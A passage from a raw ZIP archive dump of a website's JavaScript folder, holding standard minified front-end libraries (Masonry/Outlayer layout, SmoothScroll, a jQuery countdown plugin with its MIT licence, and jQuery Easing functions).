d.removeTransitionStyles=function(){this.css(f)},d.stagger=function(t){t=isNaN(t)?0:t,this.staggerDelay=t+"ms"},d.removeElem=function(){this.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},d.remove=function(){return s&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),void this.hide()):void this.removeElem()},d.reveal=function(){delete this.isHidden,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("visibleStyle");e[i]=this.onRevealTransitionEnd,this.transition({from:t.hiddenStyle,to:t.visibleStyle,isCleaning:!0,onTransitionEnd:e})},d.onRevealTransitionEnd=function(){this.isHidden||this.emitEvent("reveal")},d.getHideRevealTransitionEndProperty=function(t){var e=this.layout.options[t];if(e.opacity)return"opacity";for(var i in e)return i},d.hide=function(){this.isHidden=!0,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("hiddenStyle");e[i]=this.onHideTransitionEnd,this.transition({from:t.visibleStyle,to:t.hiddenStyle,isCleaning:!0,onTransitionEnd:e})},d.onHideTransitionEnd=function(){this.isHidden&&(this.css({display:"none"}),this.emitEvent("hide"))},d.destroy=function(){this.css({position:"",left:"",right:"",top:"",bottom:"",transition:"",transform:""})},n}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("outlayer/outlayer",["ev-emitter/ev-emitter","get-size/get-size","fizzy-ui-utils/utils","./item"],function(i,n,o,r){return e(t,i,n,o,r)}):"object"==typeof module&&module.exports?module.exports=e(t,require("ev-emitter"),require("get-size"),require("fizzy-ui-utils"),require("./item")):t.Outlayer=e(t,t.EvEmitter,t.getSize,t.fizzyUIUtils,t.Outlayer.Item)}(window,function(t,e,i,n,o){"use strict";function r(t,e){var i=n.getQueryElement(t);if(!i)return void(h&&h.error("Bad element for "+this.constructor.namespace+": "+(i||t)));this.element=i,u&&(this.$element=u(this.element)),this.options=n.extend({},this.constructor.defaults),this.option(e);var o=++l;this.element.outlayerGUID=o,c[o]=this,this._create();var r=this._getOption("initLayout");r&&this.layout()}function s(t){function e(){t.apply(this,arguments)}return e.prototype=Object.create(t.prototype),e.prototype.constructor=e,e}function a(t){if("number"==typeof t)return t;var e=t.match(/(^\d*\.?\d*)(\w*)/),i=e&&e[1],n=e&&e[2];if(!i.length)return 0;i=parseFloat(i);var o=m[n]||1;return i*o}var h=t.console,u=t.jQuery,d=function(){},l=0,c={};r.namespace="outlayer",r.Item=o,r.defaults={containerStyle:{position:"relative"},initLayout:!0,originLeft:!0,originTop:!0,resize:!0,resizeContainer:!0,transitionDuration:"0.4s",hiddenStyle:{opacity:0,transform:"scale(0.001)"},visibleStyle:{opacity:1,transform:"scale(1)"}};var f=r.prototype;n.extend(f,e.prototype),f.option=function(t){n.extend(this.options,t)},f._getOption=function(t){var e=this.constructor.compatOptions[t];return e&&void 0!==this.options[e]?this.options[e]:this.options[t]},r.compatOptions={initLayout:"isInitLayout",horizontal:"isHorizontal",layoutInstant:"isLayoutInstant",originLeft:"isOriginLeft",originTop:"isOriginTop",resize:"isResizeBound",resizeContainer:"isResizingContainer"},f._create=function(){this.reloadItems(),this.stamps=[],this.stamp(this.options.stamp),n.extend(this.element.style,this.options.containerStyle);var t=this._getOption("resize");t&&this.bindResize()},f.reloadItems=function(){this.items=this._itemize(this.element.children)},f._itemize=function(t){for(var e=this._filterFindItemElements(t),i=this.constructor.Item,n=[],o=0;o<e.length;o++){var r=e[o],s=new i(r,this);n.push(s)}return n},f._filterFindItemElements=function(t){return n.filterFindElements(t,this.options.itemSelector)},f.getItemElements=function(){return this.items.map(function(t){return t.element})},f.layout=function(){this._resetLayout(),this._manageStamps();var t=this._getOption("layoutInstant"),e=void 0!==t?t:!this._isLayoutInited;this.layoutItems(this.items,e),this._isLayoutInited=!0},f._init=f.layout,f._resetLayout=function(){this.getSize()},f.getSize=function(){this.size=i(this.element)},f._getMeasurement=function(t,e){var n,o=this.options[t];o?("string"==typeof o?n=this.element.querySelector(o):o instanceof HTMLElement&&(n=o),this[t]=n?i(n)[e]:o):this[t]=0},f.layoutItems=function(t,e){t=this._getItemsForLayout(t),this._layoutItems(t,e),this._postLayout()},f._getItemsForLayout=function(t){return t.filter(function(t){return!t.isIgnored})},f._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),t&&t.length){var i=[];t.forEach(function(t){var n=this._getItemLayoutPosition(t);n.item=t,n.isInstant=e||t.isLayoutInstant,i.push(n)},this),this._processLayoutQueue(i)}},f._getItemLayoutPosition=function(){return{x:0,y:0}},f._processLayoutQueue=function(t){this.updateStagger(),t.forEach(function(t,e){this._positionItem(t.item,t.x,t.y,t.isInstant,e)},this)},f.updateStagger=function(){var t=this.options.stagger;return null===t||void 0===t?void(this.stagger=0):(this.stagger=a(t),this.stagger)},f._positionItem=function(t,e,i,n,o){n?t.goTo(e,i):(t.stagger(o*this.stagger),t.moveTo(e,i))},f._postLayout=function(){this.resizeContainer()},f.resizeContainer=function(){var t=this._getOption("resizeContainer");if(t){var e=this._getContainerSize();e&&(this._setContainerMeasure(e.width,!0),this._setContainerMeasure(e.height,!1))}},f._getContainerSize=d,f._setContainerMeasure=function(t,e){if(void 0!==t){var i=this.size;i.isBorderBox&&(t+=e?i.paddingLeft+i.paddingRight+i.borderLeftWidth+i.borderRightWidth:i.paddingBottom+i.paddingTop+i.borderTopWidth+i.borderBottomWidth),t=Math.max(t,0),this.element.style[e?"width":"height"]=t+"px"}},f._emitCompleteOnItems=function(t,e){function i(){o.dispatchEvent(t+"Complete",null,[e])}function n(){s++,s==r&&i()}var o=this,r=e.length;if(!e||!r)return void i();var s=0;e.forEach(function(e){e.once(t,n)})},f.dispatchEvent=function(t,e,i){var n=e?[e].concat(i):i;if(this.emitEvent(t,n),u)if(this.$element=this.$element||u(this.element),e){var o=u.Event(e);o.type=t,this.$element.trigger(o,i)}else this.$element.trigger(t,i)},f.ignore=function(t){var e=this.getItem(t);e&&(e.isIgnored=!0)},f.unignore=function(t){var e=this.getItem(t);e&&delete e.isIgnored},f.stamp=function(t){t=this._find(t),t&&(this.stamps=this.stamps.concat(t),t.forEach(this.ignore,this))},f.unstamp=function(t){t=this._find(t),t&&t.forEach(function(t){n.removeFrom(this.stamps,t),this.unignore(t)},this)},f._find=function(t){return t?("string"==typeof t&&(t=this.element.querySelectorAll(t)),t=n.makeArray(t)):void 0},f._manageStamps=function(){this.stamps&&this.stamps.length&&(this._getBoundingRect(),this.stamps.forEach(this._manageStamp,this))},f._getBoundingRect=function(){var t=this.element.getBoundingClientRect(),e=this.size;this._boundingRect={left:t.left+e.paddingLeft+e.borderLeftWidth,top:t.top+e.paddingTop+e.borderTopWidth,right:t.right-(e.paddingRight+e.borderRightWidth),bottom:t.bottom-(e.paddingBottom+e.borderBottomWidth)}},f._manageStamp=d,f._getElementOffset=function(t){var e=t.getBoundingClientRect(),n=this._boundingRect,o=i(t),r={left:e.left-n.left-o.marginLeft,top:e.top-n.top-o.marginTop,right:n.right-e.right-o.marginRight,bottom:n.bottom-e.bottom-o.marginBottom};return r},f.handleEvent=n.handleEvent,f.bindResize=function(){t.addEventListener("resize",this),this.isResizeBound=!0},f.unbindResize=function(){t.removeEventListener("resize",this),this.isResizeBound=!1},f.onresize=function(){this.resize()},n.debounceMethod(r,"onresize",100),f.resize=function(){this.isResizeBound&&this.needsResizeLayout()&&this.layout()},f.needsResizeLayout=function(){var t=i(this.element),e=this.size&&t;return e&&t.innerWidth!==this.size.innerWidth},f.addItems=function(t){var e=this._itemize(t);return e.length&&(this.items=this.items.concat(e)),e},f.appended=function(t){var e=this.addItems(t);e.length&&(this.layoutItems(e,!0),this.reveal(e))},f.prepended=function(t){var e=this._itemize(t);if(e.length){var i=this.items.slice(0);this.items=e.concat(i),this._resetLayout(),this._manageStamps(),this.layoutItems(e,!0),this.reveal(e),this.layoutItems(i)}},f.reveal=function(t){if(this._emitCompleteOnItems("reveal",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.reveal()})}},f.hide=function(t){if(this._emitCompleteOnItems("hide",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.hide()})}},f.revealItemElements=function(t){var e=this.getItems(t);this.reveal(e)},f.hideItemElements=function(t){var e=this.getItems(t);this.hide(e)},f.getItem=function(t){for(var e=0;e<this.items.length;e++){var i=this.items[e];if(i.element==t)return i}},f.getItems=function(t){t=n.makeArray(t);var e=[];return t.forEach(function(t){var i=this.getItem(t);i&&e.push(i)},this),e},f.remove=function(t){var e=this.getItems(t);this._emitCompleteOnItems("remove",e),e&&e.length&&e.forEach(function(t){t.remove(),n.removeFrom(this.items,t)},this)},f.destroy=function(){var t=this.element.style;t.height="",t.position="",t.width="",this.items.forEach(function(t){t.destroy()}),this.unbindResize();var e=this.element.outlayerGUID;delete c[e],delete this.element.outlayerGUID,u&&u.removeData(this.element,this.constructor.namespace)},r.data=function(t){t=n.getQueryElement(t);var e=t&&t.outlayerGUID;return e&&c[e]},r.create=function(t,e){var i=s(r);return i.defaults=n.extend({},r.defaults),n.extend(i.defaults,e),i.compatOptions=n.extend({},r.compatOptions),i.namespace=t,i.data=r.data,i.Item=s(o),n.htmlInit(i,t),u&&u.bridget&&u.bridget(t,i),i};var m={ms:1,s:1e3};return r.Item=o,r}),function(t,e){"function"==typeof define&&define.amd?define(["outlayer/outlayer","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("outlayer"),require("get-size")):t.Masonry=e(t.Outlayer,t.getSize)}(window,function(t,e){var i=t.create("masonry");i.compatOptions.fitWidth="isFitWidth";var n=i.prototype;return n._resetLayout=function(){this.getSize(),this._getMeasurement("columnWidth","outerWidth"),this._getMeasurement("gutter","outerWidth"),this.measureColumns(),this.colYs=[];for(var t=0;t<this.cols;t++)this.colYs.push(0);this.maxY=0,this.horizontalColIndex=0},n.measureColumns=function(){if(this.getContainerWidth(),!this.columnWidth){var t=this.items[0],i=t&&t.element;this.columnWidth=i&&e(i).outerWidth||this.containerWidth}var n=this.columnWidth+=this.gutter,o=this.containerWidth+this.gutter,r=o/n,s=n-o%n,a=s&&1>s?"round":"floor";r=Math[a](r),this.cols=Math.max(r,1)},n.getContainerWidth=function(){var t=this._getOption("fitWidth"),i=t?this.element.parentNode:this.element,n=e(i);this.containerWidth=n&&n.innerWidth},n._getItemLayoutPosition=function(t){t.getSize();var e=t.size.outerWidth%this.columnWidth,i=e&&1>e?"round":"ceil",n=Math[i](t.size.outerWidth/this.columnWidth);n=Math.min(n,this.cols);for(var o=this.options.horizontalOrder?"_getHorizontalColPosition":"_getTopColPosition",r=this[o](n,t),s={x:this.columnWidth*r.col,y:r.y},a=r.y+t.size.outerHeight,h=n+r.col,u=r.col;h>u;u++)this.colYs[u]=a;return s},n._getTopColPosition=function(t){var e=this._getTopColGroup(t),i=Math.min.apply(Math,e);return{col:e.indexOf(i),y:i}},n._getTopColGroup=function(t){if(2>t)return this.colYs;for(var e=[],i=this.cols+1-t,n=0;i>n;n++)e[n]=this._getColGroupY(n,t);return e},n._getColGroupY=function(t,e){if(2>e)return this.colYs[t];var i=this.colYs.slice(t,t+e);return Math.max.apply(Math,i)},n._getHorizontalColPosition=function(t,e){var i=this.horizontalColIndex%this.cols,n=t>1&&i+t>this.cols;i=n?0:i;var o=e.size.outerWidth&&e.size.outerHeight;return this.horizontalColIndex=o?i+t:this.horizontalColIndex,{col:i,y:this._getColGroupY(i,t)}},n._manageStamp=function(t){var i=e(t),n=this._getElementOffset(t),o=this._getOption("originLeft"),r=o?n.left:n.right,s=r+i.outerWidth,a=Math.floor(r/this.columnWidth);a=Math.max(0,a);var h=Math.floor(s/this.columnWidth);h-=s%this.columnWidth?0:1,h=Math.min(this.cols-1,h);for(var u=this._getOption("originTop"),d=(u?n.top:n.bottom)+i.outerHeight,l=a;h>=l;l++)this.colYs[l]=Math.max(d,this.colYs[l])},n._getContainerSize=function(){this.maxY=Math.max.apply(Math,this.colYs);var t={height:this.maxY};return this._getOption("fitWidth")&&(t.width=this._getContainerFitWidth()),t},n._getContainerFitWidth=function(){for(var t=0,e=this.cols;--e&&0===this.colYs[e];)t++;return(this.cols-t)*this.columnWidth-this.gutter},n.needsResizeLayout=function(){var t=this.containerWidth;return this.getContainerWidth(),t!=this.containerWidth},i});PK!M`��>>flex/js/SmoothScroll-1.4.9.jsnu&1i�// SmoothScroll.js version 1.4.9 (http://www.smoothscroll.net/)
!function(){var s,i,c,a,o={frameRate:150,animationTime:400,stepSize:100,pulseAlgorithm:!0,pulseScale:4,pulseNormalize:1,accelerationDelta:50,accelerationMax:3,keyboardSupport:!0,arrowScroll:50,fixedBackground:!0,excluded:""},p=o,u=!1,d=!1,l={x:0,y:0},f=!1,m=document.documentElement,h=[],w=/^Mac/.test(navigator.platform),v={left:37,up:38,right:39,down:40,spacebar:32,pageup:33,pagedown:34,end:35,home:36},y={37:1,38:1,39:1,40:1};function b(){if(!f&&document.body){f=!0;var e=document.body,t=document.documentElement,o=window.innerHeight,n=e.scrollHeight;if(m=0<=document.compatMode.indexOf("CSS")?t:e,s=e,p.keyboardSupport&&Y("keydown",D),top!=self)d=!0;else if(Q&&o<n&&(e.offsetHeight<=o||t.offsetHeight<=o)){var r,a=document.createElement("div");a.style.cssText="position:absolute; z-index:-10000; top:0; left:0; right:0; height:"+m.scrollHeight+"px",document.body.appendChild(a),c=function(){r||(r=setTimeout(function(){u||(a.style.height="0",a.style.height=m.scrollHeight+"px",r=null)},500))},setTimeout(c,10),Y("resize",c);if((i=new R(c)).observe(e,{attributes:!0,childList:!0,characterData:!1}),m.offsetHeight<=o){var l=document.createElement("div");l.style.clear="both",e.appendChild(l)}}p.fixedBackground||u||(e.style.backgroundAttachment="scroll",t.style.backgroundAttachment="scroll")}}var g=[],S=!1,x=Date.now();function k(d,f,m){var e,t;if(e=0<(e=f)?1:-1,t=0<(t=m)?1:-1,(l.x!==e||l.y!==t)&&(l.x=e,l.y=t,g=[],x=0),1!=p.accelerationMax){var o=Date.now()-x;if(o<p.accelerationDelta){var n=(1+50/o)/2;1<n&&(n=Math.min(n,p.accelerationMax),f*=n,m*=n)}x=Date.now()}if(g.push({x:f,y:m,lastX:f<0?.99:-.99,lastY:m<0?.99:-.99,start:Date.now()}),!S){var r=q(),h=d===r||d===document.body;null==d.$scrollBehavior&&function(e){var t=M(e);if(null==B[t]){var o=getComputedStyle(e,"")["scroll-behavior"];B[t]="smooth"==o}return B[t]}(d)&&(d.$scrollBehavior=d.style.scrollBehavior,d.style.scrollBehavior="auto");var w=function(e){for(var t=Date.now(),o=0,n=0,r=0;r<g.length;r++){var a=g[r],l=t-a.start,i=l>=p.animationTime,c=i?1:l/p.animationTime;p.pulseAlgorithm&&(c=F(c));var s=a.x*c-a.lastX>>0,u=a.y*c-a.lastY>>0;o+=s,n+=u,a.lastX+=s,a.lastY+=u,i&&(g.splice(r,1),r--)}h?window.scrollBy(o,n):(o&&(d.scrollLeft+=o),n&&(d.scrollTop+=n)),f||m||(g=[]),g.length?j(w,d,1e3/p.frameRate+1):(S=!1,null!=d.$scrollBehavior&&(d.style.scrollBehavior=d.$scrollBehavior,d.$scrollBehavior=null))};j(w,d,0),S=!0}}function e(e){f||b();var t=e.target;if(e.defaultPrevented||e.ctrlKey)return!0;if(N(s,"embed")||N(t,"embed")&&/\.pdf/i.test(t.src)||N(s,"object")||t.shadowRoot)return!0;var o=-e.wheelDeltaX||e.deltaX||0,n=-e.wheelDeltaY||e.deltaY||0;w&&(e.wheelDeltaX&&K(e.wheelDeltaX,120)&&(o=e.wheelDeltaX/Math.abs(e.wheelDeltaX)*-120),e.wheelDeltaY&&K(e.wheelDeltaY,120)&&(n=e.wheelDeltaY/Math.abs(e.wheelDeltaY)*-120)),o||n||(n=-e.wheelDelta||0),1===e.deltaMode&&(o*=40,n*=40);var r=z(t);return r?!!function(e){if(!e)return;h.length||(h=[e,e,e]);e=Math.abs(e),h.push(e),h.shift(),clearTimeout(a),a=setTimeout(function(){try{localStorage.SS_deltaBuffer=h.join(",")}catch(e){}},1e3);var t=120<e&&P(e);return!P(120)&&!P(100)&&!t}(n)||(1.2<Math.abs(o)&&(o*=p.stepSize/120),1.2<Math.abs(n)&&(n*=p.stepSize/120),k(r,o,n),e.preventDefault(),void C()):!d||!W||(Object.defineProperty(e,"target",{value:window.frameElement}),parent.wheel(e))}function D(e){var t=e.target,o=e.ctrlKey||e.altKey||e.metaKey||e.shiftKey&&e.keyCode!==v.spacebar;document.body.contains(s)||(s=document.activeElement);var n=/^(button|submit|radio|checkbox|file|color|image)$/i;if(e.defaultPrevented||/^(textarea|select|embed|object)$/i.test(t.nodeName)||N(t,"input")&&!n.test(t.type)||N(s,"video")||function(e){var t=e.target,o=!1;if(-1!=document.URL.indexOf("www.youtube.com/watch"))do{if(o=t.classList&&t.classList.contains("html5-video-controls"))break}while(t=t.parentNode);return o}(e)||t.isContentEditable||o)return!0;if((N(t,"button")||N(t,"input")&&n.test(t.type))&&e.keyCode===v.spacebar)return!0;if(N(t,"input")&&"radio"==t.type&&y[e.keyCode])return!0;var r=0,a=0,l=z(s);if(!l)return!d||!W||parent.keydown(e);var i=l.clientHeight;switch(l==document.body&&(i=window.innerHeight),e.keyCode){case v.up:a=-p.arrowScroll;break;case v.down:a=p.arrowScroll;break;case v.spacebar:a=-(e.shiftKey?1:-1)*i*.9;break;case v.pageup:a=.9*-i;break;case v.pagedown:a=.9*i;break;case v.home:l==document.body&&document.scrollingElement&&(l=document.scrollingElement),a=-l.scrollTop;break;case v.end:var c=l.scrollHeight-l.scrollTop-i;a=0<c?c+10:0;break;case v.left:r=-p.arrowScroll;break;case v.right:r=p.arrowScroll;break;default:return!0}k(l,r,a),e.preventDefault(),C()}function t(e){s=e.target}var n,r,M=(n=0,function(e){return e.uniqueID||(e.uniqueID=n++)}),E={},T={},B={};function C(){clearTimeout(r),r=setInterval(function(){E=T=B={}},1e3)}function H(e,t,o){for(var n=o?E:T,r=e.length;r--;)n[M(e[r])]=t;return t}function z(e){var t=[],o=document.body,n=m.scrollHeight;do{var r=(!1?E:T)[M(e)];if(r)return H(t,r);if(t.push(e),n===e.scrollHeight){var a=O(m)&&O(o)||X(m);if(d&&L(m)||!d&&a)return H(t,q())}else if(L(e)&&X(e))return H(t,e)}while(e=e.parentElement)}function L(e){return e.clientHeight+10<e.scrollHeight}function O(e){return"hidden"!==getComputedStyle(e,"").getPropertyValue("overflow-y")}function X(e){var t=getComputedStyle(e,"").getPropertyValue("overflow-y");return"scroll"===t||"auto"===t}function Y(e,t,o){window.addEventListener(e,t,o||!1)}function A(e,t,o){window.removeEventListener(e,t,o||!1)}function N(e,t){return e&&(e.nodeName||"").toLowerCase()===t.toLowerCase()}if(window.localStorage&&localStorage.SS_deltaBuffer)try{h=localStorage.SS_deltaBuffer.split(",")}catch(e){}function K(e,t){return Math.floor(e/t)==e/t}function P(e){return K(h[0],e)&&K(h[1],e)&&K(h[2],e)}var $,j=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e,t,o){window.setTimeout(e,o||1e3/60)},R=window.MutationObserver||window.WebKitMutationObserver||window.MozMutationObserver,q=($=document.scrollingElement,function(){if(!$){var e=document.createElement("div");e.style.cssText="height:10000px;width:1px;",document.body.appendChild(e);var t=document.body.scrollTop;document.documentElement.scrollTop,window.scrollBy(0,3),$=document.body.scrollTop!=t?document.body:document.documentElement,window.scrollBy(0,-3),document.body.removeChild(e)}return $});function V(e){var t;return((e*=p.pulseScale)<1?e-(1-Math.exp(-e)):(e-=1,(t=Math.exp(-1))+(1-Math.exp(-e))*(1-t)))*p.pulseNormalize}function F(e){return 1<=e?1:e<=0?0:(1==p.pulseNormalize&&(p.pulseNormalize/=V(1)),V(e))}var I=window.navigator.userAgent,_=/Edge/.test(I),W=/chrome/i.test(I)&&!_,U=/safari/i.test(I)&&!_,G=/mobile/i.test(I),J=/Windows NT 6.1/i.test(I)&&/rv:11/i.test(I),Q=U&&(/Version\/8/i.test(I)||/Version\/9/i.test(I)),Z=(W||U||J)&&!G,ee=!1;try{window.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){ee=!0}}))}catch(e){}var te=!!ee&&{passive:!1},oe="onwheel"in document.createElement("div")?"wheel":"mousewheel";function ne(e){for(var t in e)o.hasOwnProperty(t)&&(p[t]=e[t])}oe&&Z&&(Y(oe,e,te),Y("mousedown",t),Y("load",b)),ne.destroy=function(){i&&i.disconnect(),A(oe,e),A("mousedown",t),A("keydown",D),A("resize",c),A("load",b)},window.SmoothScrollOptions&&ne(window.SmoothScrollOptions),"function"==typeof define&&define.amd?define(function(){return ne}):"object"==typeof exports?module.exports=ne:window.SmoothScroll=ne}();PK!A#��flex/js/jquery.countdown.min.jsnu&1i�/*!
 * The Final Countdown for jQuery v2.2.0 (http://hilios.github.io/jQuery.countdown/)
 * Copyright (c) 2016 Edson Hilios
 * 
 * Permission is hereby granted, free of charge, to any person obtaining a copy of
 * this software and associated documentation files (the "Software"), to deal in
 * the Software without restriction, including without limitation the rights to
 * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 * the Software, and to permit persons to whom the Software is furnished to do so,
 * subject to the following conditions:
 * 
 * The above copyright notice and this permission notice shall be included in all
 * copies or substantial portions of the Software.
 * 
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
 * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
 * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
 * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
 * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 */
!function(a){"use strict";"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){"use strict";function b(a){if(a instanceof Date)return a;if(String(a).match(g))return String(a).match(/^[0-9]*$/)&&(a=Number(a)),String(a).match(/\-/)&&(a=String(a).replace(/\-/g,"/")),new Date(a);throw new Error("Couldn't cast `"+a+"` to a date object.")}function c(a){var b=a.toString().replace(/([.?*+^$[\]\\(){}|-])/g,"\\$1");return new RegExp(b)}function d(a){return function(b){var d=b.match(/%(-|!)?[A-Z]{1}(:[^;]+;)?/gi);if(d)for(var f=0,g=d.length;f<g;++f){var h=d[f].match(/%(-|!)?([a-zA-Z]{1})(:[^;]+;)?/),j=c(h[0]),k=h[1]||"",l=h[3]||"",m=null;h=h[2],i.hasOwnProperty(h)&&(m=i[h],m=Number(a[m])),null!==m&&("!"===k&&(m=e(l,m)),""===k&&m<10&&(m="0"+m.toString()),b=b.replace(j,m.toString()))}return b=b.replace(/%%/,"%")}}function e(a,b){var c="s",d="";return a&&(a=a.replace(/(:|;|\s)/gi,"").split(/\,/),1===a.length?c=a[0]:(d=a[0],c=a[1])),Math.abs(b)>1?c:d}var f=[],g=[],h={precision:100,elapse:!1,defer:!1};g.push(/^[0-9]*$/.source),g.push(/([0-9]{1,2}\/){2}[0-9]{4}( [0-9]{1,2}(:[0-9]{2}){2})?/.source),g.push(/[0-9]{4}([\/\-][0-9]{1,2}){2}( [0-9]{1,2}(:[0-9]{2}){2})?/.source),g=new RegExp(g.join("|"));var i={Y:"years",m:"months",n:"daysToMonth",d:"daysToWeek",w:"weeks",W:"weeksToMonth",H:"hours",M:"minutes",S:"seconds",D:"totalDays",I:"totalHours",N:"totalMinutes",T:"totalSeconds"},j=function(b,c,d){this.el=b,this.$el=a(b),this.interval=null,this.offset={},this.options=a.extend({},h),this.instanceNumber=f.length,f.push(this),this.$el.data("countdown-instance",this.instanceNumber),d&&("function"==typeof d?(this.$el.on("update.countdown",d),this.$el.on("stoped.countdown",d),this.$el.on("finish.countdown",d)):this.options=a.extend({},h,d)),this.setFinalDate(c),this.options.defer===!1&&this.start()};a.extend(j.prototype,{start:function(){null!==this.interval&&clearInterval(this.interval);var a=this;this.update(),this.interval=setInterval(function(){a.update.call(a)},this.options.precision)},stop:function(){clearInterval(this.interval),this.interval=null,this.dispatchEvent("stoped")},toggle:function(){this.interval?this.stop():this.start()},pause:function(){this.stop()},resume:function(){this.start()},remove:function(){this.stop.call(this),f[this.instanceNumber]=null,delete this.$el.data().countdownInstance},setFinalDate:function(a){this.finalDate=b(a)},update:function(){if(0===this.$el.closest("html").length)return void this.remove();var b,c=void 0!==a._data(this.el,"events"),d=new Date;b=this.finalDate.getTime()-d.getTime(),b=Math.ceil(b/1e3),b=!this.options.elapse&&b<0?0:Math.abs(b),this.totalSecsLeft!==b&&c&&(this.totalSecsLeft=b,this.elapsed=d>=this.finalDate,this.offset={seconds:this.totalSecsLeft%60,minutes:Math.floor(this.totalSecsLeft/60)%60,hours:Math.floor(this.totalSecsLeft/60/60)%24,days:Math.floor(this.totalSecsLeft/60/60/24)%7,daysToWeek:Math.floor(this.totalSecsLeft/60/60/24)%7,daysToMonth:Math.floor(this.totalSecsLeft/60/60/24%30.4368),weeks:Math.floor(this.totalSecsLeft/60/60/24/7),weeksToMonth:Math.floor(this.totalSecsLeft/60/60/24/7)%4,months:Math.floor(this.totalSecsLeft/60/60/24/30.4368),years:Math.abs(this.finalDate.getFullYear()-d.getFullYear()),totalDays:Math.floor(this.totalSecsLeft/60/60/24),totalHours:Math.floor(this.totalSecsLeft/60/60),totalMinutes:Math.floor(this.totalSecsLeft/60),totalSeconds:this.totalSecsLeft},this.options.elapse||0!==this.totalSecsLeft?this.dispatchEvent("update"):(this.stop(),this.dispatchEvent("finish")))},dispatchEvent:function(b){var c=a.Event(b+".countdown");c.finalDate=this.finalDate,c.elapsed=this.elapsed,c.offset=a.extend({},this.offset),c.strftime=d(this.offset),this.$el.trigger(c)}}),a.fn.countdown=function(){var b=Array.prototype.slice.call(arguments,0);return this.each(function(){var c=a(this).data("countdown-instance");if(void 0!==c){var d=f[c],e=b[0];j.prototype.hasOwnProperty(e)?d[e].apply(d,b.slice(1)):null===String(e).match(/^[$A-Z_][0-9A-Z_$]*$/i)?(d.setFinalDate.call(d,e),d.start()):a.error("Method %s does not exist on jQuery.countdown".replace(/\%s/gi,e))}else new j(this,b[0],b[1])})}});PK!U�;UUflex/js/jquery.easing.min.jsnu&1i�/* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/ */
jQuery.easing.jswing=jQuery.easing.swing;jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,f,a,h,g){return jQuery.easing[jQuery.easing.def](e,f,a,h,g)},easeInQuad:function(e,f,a,h,g){return h*(f/=g)*f+a},easeOutQuad:function(e,f,a,h,g){return -h*(f/=g)*(f-2)+a},easeInOutQuad:function(e,f,a,h,g){if((f/=g/2)<1){return h/2*f*f+a}return -h/2*((--f)*(f-2)-1)+a},easeInCubic:function(e,f,a,h,g){return h*(f/=g)*f*f+a},easeOutCubic:function(e,f,a,h,g){return h*((f=f/g-1)*f*f+1)+a},easeInOutCubic:function(e,f,a,h,g){if((f/=g/2)<1){return h/2*f*f*f+a}return h/2*((f-=2)*f*f+2)+a},easeInQuart:function(e,f,a,h,g){return h*(f/=g)*f*f*f+a},easeOutQuart:function(e,f,a,h,g){return -h*((f=f/g-1)*f*f*f-1)+a},easeInOutQuart:function(e,f,a,h,g){if((f/=g/2)<1){return h/2*f*f*f*f+a}return -h/2*((f-=2)*f*f*f-2)+a},easeInQuint:function(e,f,a,h,g){return h*(f/=g)*f*f*f*f+a},easeOutQuint:function(e,f,a,h,g){return h*((f=f/g-1)*f*f*f*f+1)+a},easeInOutQuint:function(e,f,a,h,g){if((f/=g/2)<1){return h/2*f*f*f*f*f+a}return h/2*((f-=2)*f*f*f*f+2)+a},easeInSine:function(e,f,a,h,g){return -h*Math.cos(f/g*(Math.PI/2))+h+a},easeOutSine:function(e,f,a,h,g){return h*Math.sin(f/g*(Math.PI/2))+a},easeInOutSine:function(e,f,a,h,g){return -h/2*(Math.cos(Math.PI*f/g)-1)+a},easeInExpo:function(e,f,a,h,g){return(f==0)?a:h*Math.pow(2,10*(f/g-1))+a},easeOutExpo:function(e,f,a,h,g){return(f==g)?a+h:h*(-Math.pow(2,-10*f/g)+1)+a},easeInOutExpo:function(e,f,a,h,g){if(f==0){return a}if(f==g){return a+h}if((f/=g/2)<1){return h/2*Math.pow(2,10*(f-1))+a}return h/2*(-Math.pow(2,-10*--f)+2)+a},easeInCirc:function(e,f,a,h,g){return -h*(Math.sqrt(1-(f/=g)*f)-1)+a},easeOutCirc:function(e,f,a,h,g){return h*Math.sqrt(1-(f=f/g-1)*f)+a},easeInOutCirc:function(e,f,a,h,g){if((f/=g/2)<1){return -h/2*(Math.sqrt(1-f*f)-1)+a}return h/2*(Math.sqrt(1-(f-=2)*f)+1)+a},easeInElastic:function(f,h,e,l,k){var i=1.70158;var j=0;var g=l;if(h==0){return e}if((h/=k)==1){return e+l}if(!j){j=k*0.3}if(g<Math.abs(l)){g=l;var i=j/4}else{var i=j/(2*Math.PI)*Math.asin(l/g)}return -(g*Math.pow(2,10*(h-=1))*Math.sin((h*k-i)*(2*Math.PI)/j))+e},easeOutElastic:function(f,h,e,l,k){var i=1.70158;var j=0;var g=l;if(h==0){return e}if((h/=k)==1){return e+l}if(!j){j=k*0.3}if(g<Math.abs(l)){g=l;var i=j/4}else{var i=j/(2*Math.PI)*Math.asin(l/g)}return 